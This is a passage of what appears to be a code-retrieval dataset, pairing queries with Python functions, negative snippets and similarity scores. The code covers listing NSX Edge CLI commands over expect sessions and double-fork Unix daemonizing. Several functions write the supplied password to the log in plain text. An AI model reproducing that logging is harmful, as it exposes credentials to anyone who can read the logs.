return self.docs_command.all_commands", "def get_commands(self):\n return self._commands", "def terminal_commands(self):\n return OrderedDict([\n ('query_commands', (['hi', 'how', 'hello'], self._query_commands)),\n ('control_stop', (['stop'], self._control_stop)),\n ('control_pause', (['pause'], self._control_pause)),\n ('control_play', (['start', 'play'], self._control_play)),\n ('query_info', (['who', 'what'], self._query_info)),\n ('control_forward', (['skip', 'next'], self._control_skip)),\n\n ])", "def get_admin_commands(self):\n\n return []", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"" ]
[ "0.6511725", "0.63629586", "0.62398857", "0.61768675", "0.6060961", "0.60467505", "0.60360336", "0.6015906", "0.60068876", "0.59958434", "0.59946626", "0.59913915", "0.597592", "0.5959561", "0.5952795", "0.5924984", "0.58672166", "0.5802978", "0.57971066", "0.5770296", "0.5765358", "0.5748881", "0.57127273", "0.5712307", "0.5711467", "0.56788874", "0.5673432", "0.5655188", "0.5644647", "0.5644096" ]
0.7366051
0
Logs in to the given NSX edge in enable mode with the specified credentials and fetches the list of all supported commands. Returns the list of commands as a Python set. Refer to /VDNetLib/TestData/Edge/list_command_enable_mode for the output format
def get_all_supported_commands_enable_mode( cls, client_object, **kwargs): pydict = dict() try: if "password" in kwargs: password = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % password) # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_enable_terminal("list", ['#'], password=password) else: # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_enable_terminal("list", ['#']) except: # Close the expect connection object client_object.connection.close() pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() # Fetching the Error string if any error_occured = command_output.find('Error') if expect_condition == 0: # expecting the '#' prompt if error_occured == -1: pylogger.info("Successfully listing enable mode commands") lines = command_output.strip().split("\n") lines = [i.strip() for i in lines] if "NSXEdge" in lines: lines.remove("NSXEdge") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list enable mode commands") else: pydict['result'] = False return pydict
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_all_supported_commands_configure_mode(cls, client_object,\n **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n pwd = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % pwd)\n else:\n pwd = constants.VSMterms.PASSWORD\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_configure_terminal(\"list\", ['#'],\n enable_password=pwd)\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing configure mode commands\")\n lines = command_output.split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge(config)\" in lines:\n lines.remove(\"NSXEdge(config)\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list config mode commands\")\n else:\n raise RuntimeError(\"Unable to establish expect connection\")", "def get_all_supported_commands_admin_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n EXPECT_PROMPT = ['bytes*', 'NSXEdge>']\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n client_object.password = password\n\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n else:\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n except:\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing admin mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list admin mode commands\")", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def getCommands(self):", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def list_commands(self, ctx):\n commands = self._iter_commands()\n return commands.keys()", "def get_commands(self):\n return list(self.commands.values())", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def list_command(ctx: Any) -> None:\n pass", "def getCommandList(self):\n return self.commands.keys()", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def do_list_commands(self):\n result = \"\\n\".join(self.commands.keys())\n return result, True", "def get_admin_commands(self):\n\n return 
[]", "def commands(self) -> List[Command]:\n return []", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def get_commands(self):\n\t\treturn list(self.command_handlers.keys())", "def list_commands(self, ctx):\n commands = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n commands.append(filename[4:-3])\n commands.sort()\n return commands", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'", "def get_commands(self):\r\n return self._commands", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def _get_supported_commands(self):\n logger.info(\"Default unconfigured API, not adding any commands!\")\n pass", "def setup_commands(self):\n return self.get_data(\"setup_commands\")", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "async def listcommands(self, ctx):\n\t\twith open('custom_commands.json', 'r') as f:\n\t\t\tcommands = json.load(f)\n\t\t\toutput = \", \".join([*commands])\n\t\t\tawait ctx.send(f\"```List of custom commands:\\n{output}```\")", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def get_commands(self):\n return self._commands", "def getCommands(self):\r\n return [z for x, y, z in self._log if x == 'command']" ]
[ "0.6705702", "0.66978204", "0.5725764", "0.5724217", "0.569081", "0.5650631", "0.56415504", "0.5569029", "0.556437", "0.55634505", "0.55406326", "0.5539092", "0.54985934", "0.5491004", "0.5447574", "0.54346836", "0.54318064", "0.54090124", "0.54086053", "0.5407843", "0.540509", "0.5399598", "0.53862506", "0.538494", "0.53437984", "0.5333684", "0.5327338", "0.53220916", "0.5266587", "0.5249537" ]
0.7370529
0
Logs in to the given NSX edge in admin mode with the specified credentials and fetches the list of all supported commands. Returns the list of commands as a Python set. Refer to /VDNetLib/TestData/Edge/list_command_admin_mode for the output format
def get_all_supported_commands_admin_mode( cls, client_object, **kwargs): pydict = dict() EXPECT_PROMPT = ['bytes*', 'NSXEdge>'] try: if "password" in kwargs: password = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % password) client_object.password = password # Execute the command on the Edge VM command_output = client_object.connection.\ request("list", EXPECT_PROMPT).response_data else: # Execute the command on the Edge VM command_output = client_object.connection.\ request("list", EXPECT_PROMPT).response_data except: pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() # Fetching the Error string if any error_occured = command_output.find('Error') if error_occured == -1: pylogger.info("Successfully listing admin mode commands") lines = command_output.strip().split("\n") lines = [i.strip() for i in lines] if "NSXEdge" in lines: lines.remove("NSXEdge") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list admin mode commands")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_admin_commands(self):\n\n return []", "def get_all_supported_commands_enable_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'],\n password=password)\n\n else:\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'])\n\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing enable mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list enable mode commands\")\n else:\n pydict['result'] = False\n return pydict", "def get_all_supported_commands_configure_mode(cls, client_object,\n **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n pwd = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % pwd)\n else:\n pwd = constants.VSMterms.PASSWORD\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_configure_terminal(\"list\", ['#'],\n enable_password=pwd)\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing configure mode commands\")\n lines = command_output.split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge(config)\" in lines:\n lines.remove(\"NSXEdge(config)\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list config mode commands\")\n else:\n raise RuntimeError(\"Unable to establish expect connection\")", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_command(ctx: Any) -> None:\n pass", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def getCommands(self):", "async def _c_list(self, ctx):\n command_list = self.database.get_guild_commands(ctx.guild.id)\n if len(command_list) == 0:\n await ctx.send(\"This server has no custom commands\")\n return\n out = \"```\\nServer Commands:\\n\"\n for command in command_list:\n out += f\"{command.name}: {command.text}\\n\"\n out += \"```\"\n await ctx.send(out)", "def get_commands(self):\n return list(self.commands.values())", "def list_commands(self, ctx):\n commands 
= self._iter_commands()\n return commands.keys()", "def get_commands(self):\r\n return self._commands", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def list_commands(self, ctx: Context) -> List[str]:\n return self.docs_command.all_commands", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def getCommandList(self):\n return self.commands.keys()", "def commands(self) -> List[Command]:\n return []", "async def listcommands(self, ctx):\n\t\twith open('custom_commands.json', 'r') as f:\n\t\t\tcommands = json.load(f)\n\t\t\toutput = \", \".join([*commands])\n\t\t\tawait ctx.send(f\"```List of custom commands:\\n{output}```\")", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def list_commands():\n print(' ')\n print('Chat Client Commands')\n print('-----------------------')\n print(\"Whisper: Send a online user a private message: /w username (message)\")\n print('Current Users: Get a list of all current online users: /users')\n print('File Transfer (Upload): Transfer a file to the server: /file (file path)')\n print('File Transfer (Download): Prints out the contents of a file: /file_download (file name)')\n print('File List: Lists all files currently stored on a server: /file_list')\n print('Save Username: Save your current username to the server to auto login at this ip address: /save')\n print('Exit: Close the client: quit or exit')\n print('Commands: Lists all commands for the Client: /help')\n print('Feed: Redisplay all messages: /feed')\n print('-----------------------')\n print(' ')", "def get_commands(self):\n return self._commands", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'", "async def _list_commands(self):\n message_cmds = \"regular commands:\\n\"\n tts_cmds = \"tts commands:\\n\"\n cur = self.conn.cursor()\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is true;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n tts_cmds += invoke[0] + ', '\n tts_cmds = tts_cmds[0:-2]\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is false;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n message_cmds += invoke[0] + ', '\n message_cmds = message_cmds[0:-2]\n cur.close()\n await self.bot.say(message_cmds)\n await self.bot.say(tts_cmds)", "def list_commands(self, ctx):\n commands = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n commands.append(filename[4:-3])\n commands.sort()\n return commands", "def get_alt_commands(self):\n return self.altcmds" ]
[ "0.6680752", "0.65000904", "0.64158475", "0.6281375", "0.6140795", "0.60326713", "0.5936857", "0.5907522", "0.58782774", "0.5867255", "0.58409363", "0.5823446", "0.581068", "0.5809843", "0.5808537", "0.5794938", "0.57770985", "0.5762379", "0.5757621", "0.57531905", "0.5749414", "0.57170707", "0.5714029", "0.5703542", "0.57002604", "0.56734246", "0.5665173", "0.56605387", "0.56561804", "0.56550336" ]
0.74650776
0
Creates or removes feed mappings. Operation statuses are returned.
def MutateFeedMappings(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_mapping(self):\n\n indice = client.IndicesClient(self.es)\n\n indice.put_mapping(index=self.es_main_index,\n doc_type=self.es_main_type,\n body=self.mapping)", "def bulk_update_mappings(\n self, mapper: Mapper[Any], mappings: Iterable[Dict[str, Any]]\n ) -> None:\n self._bulk_save_mappings(\n mapper, mappings, True, False, False, False, False\n )", "def make_mapping(self) -> None:\n start_mark = StreamMark('generated node', 0, 0, 0)\n end_mark = StreamMark('generated node', 0, 0, 0)\n self.yaml_node = yaml.MappingNode('tag:yaml.org,2002:map', list(),\n start_mark, end_mark)", "def post(self, request, *args, **kwargs):\n category_mapping_payload = request.data\n\n assert_valid(category_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n category_mapping_object = mapping_utils.create_or_update_category_mapping(category_mapping_payload)\n\n return Response(\n data=self.serializer_class(category_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def _update_index_mappings(conn, name, doc_type, mapping):\n try:\n conn.indices.put_mapping(index=name, doc_type=doc_type, body=mapping)\n except elasticsearch.exceptions.RequestError as err:\n if not err.error.startswith(\"MergeMappingException\"):\n raise\n\n message = (\n \"Elasticsearch index mapping cannot be automatically \"\n \"updated! Please reindex it. You may find the `hypothesis \"\n \"search reindex` command helpful.\"\n )\n log.critical(message)\n raise RuntimeError(message) from err", "def bulk_insert_mappings(\n self,\n mapper: Mapper[Any],\n mappings: Iterable[Dict[str, Any]],\n return_defaults: bool = False,\n render_nulls: bool = False,\n ) -> None:\n self._bulk_save_mappings(\n mapper,\n mappings,\n False,\n False,\n return_defaults,\n False,\n render_nulls,\n )", "def GetFeedMapping(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def GetFeedMapping(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def update(self, mappings):\n self._mappings.update(mappings)\n return self", "def test_update_discovery_map__no_change(self) -> None:\n expected = {\n 'schema-version': 'v1',\n 'document-version': 'z',\n 'namespaces': [],\n }\n with open(self._old_file, 'w') as f:\n json.dump(expected, f)\n self._config.discovery_map_exec = self._get_runnable_cmd(0, None, expected)\n # data-store should not run, so have it generate an error if it does.\n self._config.data_store_exec = self._get_runnable_cmd(1, None, {})\n gen = generate.GenerateDataImpl(self._config)\n res = gen.update_discovery_map()\n self.assertEqual(0, res)", "def test_model_can_create_a_URLMapping(self):\n old_count = URLMapping.objects.count()\n self.url_mapping.save()\n new_count = URLMapping.objects.count()\n self.assertNotEqual(old_count, new_count)", "def remove_atom_mapping(self, exceptions: Sequence[int] = None) -> None:\n exceptions = exceptions or []\n for atom in self.rd_mol.GetAtoms():\n if exceptions and atom.GetAtomMapNum() in exceptions:\n continue\n atom.SetAtomMapNum(0)\n self.smiles = Chem.MolToSmiles(self.rd_mol)\n self._clear_cache()", "def reset_mapping(self):\n log.debug('Resetting %s wiremock mapping', self.url)\n try:\n requests.post(self.mapping_reset_url).raise_for_status()\n except:\n log.exception('Failed resetting 
%s wiremock mapping', self.url)\n raise WiremockError('Failed resetting %s wiremock mapping' % self.url)", "def test_write(self):\n map_to_write = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_write_map.map')\n written_maps = glob.glob(map_to_write)\n self.assertEqual(len(written_maps), 0)\n with open(map_to_write, 'w') as f:\n map_ = mapreader.get_data(self.map_file)\n map_.write(f)\n written_maps = glob.glob(map_to_write)\n self.assertEqual(len(written_maps), 1)\n map(os.remove, written_maps)", "def drop_mappings(self):\n if config.HAS_RBAC:\n RBACMapping.objects(org=self._instance.id, team=self.id).delete()", "def test_store_mapping(self):\r\n\r\n expected = [\"1:\\t0\\t2\\t5\\t6\\n\",\r\n \"3:\\n\",\r\n \"4:\\n\",\r\n \"8:\\t7\\n\"]\r\n\r\n self.files_to_remove.append(\"/tmp/test_store_mapping_mapping.txt\")\r\n store_mapping(self.mapping, \"/tmp/\", prefix=\"test_store_mapping\")\r\n observed = list(open(\"/tmp/test_store_mapping_mapping.txt\", \"U\"))\r\n self.assertItemsEqual(observed, expected)", "def applyMapping(self):\n pass", "def post(self, request, *args, **kwargs):\n employee_mapping_payload = request.data\n\n assert_valid(employee_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n employee_mapping_object = mapping_utils.create_or_update_employee_mapping(employee_mapping_payload)\n\n return Response(\n data=self.serializer_class(employee_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def create_namespaced_image_stream_mapping(self, body, namespace, **kwargs):\n\n all_params = ['body', 'namespace', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_namespaced_image_stream_mapping\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_namespaced_image_stream_mapping`\")\n # verify the required parameter 'namespace' is set\n if ('namespace' not in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `create_namespaced_image_stream_mapping`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/imagestreammappings'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ImageStreamMapping',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def _fill_maps(maps, map_counts, 
paths, pixels, mapper, ctx):\n xy_ind = 0\n with RestructuredTODStore(paths) as store:\n for i, tod_pixel in enumerate(pixels):\n re_data = store.get(tod_pixel)\n values, counts = mapper.get_mapped_values(re_data, ctx)\n maps[:, xy_ind, i] = values\n map_counts[:, xy_ind, i] = counts", "def storeFeeds(self, url, feeds):\n for feed in feeds:\n _date = time.localtime()\n if 'published_parsed' in feed:\n _date = feed['published_parsed']\n date = datetime(_date.tm_year, _date.tm_mon, _date.tm_mday)\n doc = {\n '_id': md5_new(feed.id).hexdigest(),\n 'title': feed.title,\n 'date': date,\n 'link': feed.link,\n 'summary': feed.summary,\n 'type': url,\n 'status': 'new',\n }\n try:\n self.feedsCol.insert(doc)\n except DuplicateKeyError:\n pass", "def post(self, request, *args, **kwargs):\n project_mapping_payload = request.data\n\n assert_valid(project_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n project_mapping_object = mapping_utils.create_or_update_project_mapping(project_mapping_payload)\n\n return Response(\n data=self.serializer_class(project_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def _do_mapping(self):\n pass", "def post(self):\n check_content_type('application/json')\n map_object = Map()\n app.logger.info('Payload = %s', api.payload)\n map_object.deserialize(api.payload)\n map_object.save()\n app.logger.info('Map with new key [%s] saved!', map_object.key)\n return map_object.serialize(), status.HTTP_201_CREATED", "def test_update_discovery_map__failure_gen(self) -> None:\n self._config.discovery_map_exec = self._get_runnable_cmd(6, None, {})\n self._config.data_store_exec = self._get_runnable_cmd(12, None, {})\n gen = generate.GenerateDataImpl(self._config)\n res = gen.update_discovery_map()\n self.assertEqual(1, res)", "def at_idmapper_flush(self):\n return True", "def push(self, mapping):\n self.mappings.append(mapping)", "def test_commit_discovery_map__success(self) -> None:\n self.assertFalse(os.path.isfile(self._old_file))\n expected = {\n 'schema-version': 'v1',\n 'document-version': 'a',\n 'namespaces': [],\n }\n self._config.data_store_exec = self._get_runnable_cmd(0, self._gen_file, expected)\n gen = generate.GenerateDataImpl(self._config)\n res = gen.commit_discovery_map()\n self.assertEqual(0, res)\n self.assertTrue(os.path.isfile(self._old_file))\n with open(self._old_file, 'r') as f:\n self.assertEqual(expected, json.load(f))", "def create_image_stream_mapping(self, body, **kwargs):\n\n all_params = ['body', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_image_stream_mapping\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_image_stream_mapping`\")\n\n resource_path = '/oapi/v1/imagestreammappings'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not 
header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ImageStreamMapping',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def update(self):\n feed = feedparser.parse(self._schema % self.project)\n added = []\n for entry in feed['entries']:\n if entry['id'] not in self.entries:\n self.entries[entry['id']] = entry\n added.append(entry)\n return added" ]
[ "0.53210986", "0.5282509", "0.5193511", "0.51220226", "0.5118502", "0.5118434", "0.5047823", "0.5047823", "0.50096697", "0.5001195", "0.4983614", "0.49467513", "0.49398443", "0.49174434", "0.49069437", "0.48667857", "0.48645493", "0.48289153", "0.47788695", "0.4766776", "0.476327", "0.47366348", "0.47332823", "0.47295624", "0.47229648", "0.47102362", "0.47100705", "0.4690564", "0.46588916", "0.46532372" ]
0.59377956
1
Forks off a background process for execution. When this method returns, execution will be in the new process. This will also populate the PID file with the new process id. This uses the UNIX double-fork magic; see Stevens' "Advanced Programming in the UNIX Environment" (ISBN 0201563177) for details
def __daemonize(self): # The double fork thing is required to really dettach the eventual process for the current one, including # such weird details as making sure it can never be the session leader for the old process. # Do the first fork. try: pid = os.fork() if pid > 0: # exit first parent sys.exit(0) except OSError, e: sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # decouple from parent environment os.chdir("/") # noinspection PyArgumentList os.setsid() os.umask(0) # do second fork try: pid = os.fork() if pid > 0: # exit from second parent sys.exit(0) except OSError, e: sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # redirect standard file descriptors sys.stdout.flush() sys.stderr.flush() si = file(self.stdin, 'r') so = file(self.stdout, 'a+') se = file(self.stderr, 'a+', 0) os.dup2(si.fileno(), sys.stdin.fileno()) os.dup2(so.fileno(), sys.stdout.fileno()) os.dup2(se.fileno(), sys.stderr.fileno()) # write pidfile atexit.register(self.delpid) pid = os.getpid() fp = None try: fp = file(self.pidfile, 'w+') # If we are on an OS that supports reading the commandline arguments from /proc, then use that # to write more unique information about the running process to help avoid pid collison. if self.__can_read_command_line(pid): fp.write('%d %s\n' % (pid, self.__read_command_line(pid))) else: fp.write('%d\n' % pid) finally: if fp is not None: fp.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def doTask(self):\n\n def signal_cb(s, f):\n os._exit(0)\n\n for s in signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT:\n signal.signal(s, signal_cb)\n\n # write pidfile\n def atexit_cb():\n print(\"Exit fork\")\n\n atexit.register(atexit_cb)\n\n # Start the write\n i = 0\n while self.pid == 0 or not self.do_fork:\n print(self.msg % os.getpid())\n time.sleep(2)\n i += 1", "def fork():\n\tpass", "def _fork(self):\n if (self._daemonExists()):\n print \"[Error] Could not be daemonized: already in memory\"\n sys.exit(1)\n try:\n pid = os.fork()\n if (pid > 0):\n sys.exit(0)\n except OSError, e:\n print \"[Error] Fork #1 failed: %s (%d)\" % (e.strerror, e.errno)\n sys.exit(1)\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n try:\n pid = os.fork()\n if (pid > 0):\n sys.exit(0)\n except OSError, e:\n print \"[Error] Fork #2 failed: %s (%d)\" % (e.strerror, e.errno)\n sys.exit(1)", "def __init__(self, do_fork=True):\n\n self.msg = \"Test msg %d\"\n self.do_fork = do_fork\n try:\n # Store the Fork PID\n with open(\"/tmp/daemon.pids\", \"w\") as f:\n self.pid = os.fork()\n f.write(f\"{self.pid}|{os.getpid()}\\n\")\n\n if self.pid == 0:\n print(\"PID: %d\" % self.pid)\n if not do_fork:\n os._exit(0)\n\n except OSError as error:\n print(\"Unable to fork. Error: %d (%s)\" % (error.errno, error.strerror))\n os._exit(1)\n\n self.doTask()", "def startd(pidfile=''):\n # do the UNIX double-fork magic, see Stevens' \"Advanced \n # Programming in the UNIX Environment\" for details (ISBN 0201563177)\n # http://code.activestate.com/recipes/66012/\n # CHITS SMS code from Bowei Du\n try:\n pid = os.fork()\n if pid > 0:\n log.info(\"Daemon PID %d\" % pid)\n sys.exit(0)\n except OSError, e:\n log.error(\"fork #1 failed: %d (%s)\" % (e.errno, e.strerror))\n sys.exit(1)\n\n os.chdir(\"/\")\n os.setsid()\n # os.umask(0)\n\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent, print eventual PID before\n log.info(\"Daemon PID %d\" % pid)\n sys.exit(0)\n except OSError, e:\n log.error(\"fork #2 failed: %d (%s)\" % (e.errno, e.strerror))\n sys.exit(1)\n \n pid = os.getpid()\n pidfile = os.path.basename(pidfile)\n pidfile = os.path.join(PATH, 'log', pidfile)\n if not os.path.exists(pidfile):\n raise ConfigError(\"%s not found\" % pidfile)\n pf = file(pidfile,'r+')\n pf.write(\"%s\\n\" % pid)\n pf.close()\n \n return pid", "def daemonize():\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError, e:\n print >> sys.stderr, \"Fork #1 failed: %d (%s)\" % (e.errno, e.strerror)\n sys.exit(1)\n os.setsid()\n os.umask(0)\n try:\n pid = os.fork()\n if pid > 0:\n print wpath.pidfile\n dirname = os.path.dirname(wpath.pidfile)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n pidfile = open(wpath.pidfile, 'w')\n pidfile.write(str(pid) + '\\n')\n pidfile.close()\n sys.exit(0)\n except OSError, e:\n print >> sys.stderr, \"Fork #2 failed: %d (%s)\" % (e.errno, e.strerror)\n sys.exit(1)\n sys.stdout.flush()\n sys.stderr.flush()\n 